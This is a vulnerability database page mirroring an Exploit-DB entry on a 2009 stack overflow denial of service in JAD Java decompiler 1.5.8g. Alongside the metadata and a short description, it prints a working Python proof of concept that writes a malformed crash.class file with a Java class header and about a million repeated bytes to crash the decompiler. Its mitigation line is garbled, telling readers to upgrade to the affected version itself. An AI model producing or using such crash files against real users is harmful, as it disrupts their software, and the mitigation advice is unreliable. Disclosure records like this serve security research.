header-logo
Suggest Exploit
vendor:
JAD java decompiler
by:
l3D
7,5
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: JAD java decompiler
Affected Version From: 1.5.8g
Affected Version To: 1.5.8g
Patch Exists: YES
Related CWE: N/A
CPE: a:varaneckas:jad
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

JAD java decompiler 1.5.8g (.class) Stack Overflow DoS

JAD java decompiler 1.5.8g is vulnerable to a stack overflow vulnerability when a specially crafted .class file is opened. This can be exploited to cause a denial of service condition when the application is opened.

Mitigation:

Upgrade to the latest version of JAD java decompiler 1.5.8g or later.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#JAD java decompiler 1.5.8g (.class) Stack Overflow DoS
#Tested on Windows
#Software Link: http://www.varaneckas.com/jad
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com

header='\xca\xfe\xba\xbe\x01\x04\x01\x04\xff\xff'
evil='\x07\x01\x01'*0x100000
bad=open('crash.class', 'w')
bad.write(header+evil)
bad.close()

Navigation

Suggest Exploit

Services By CQR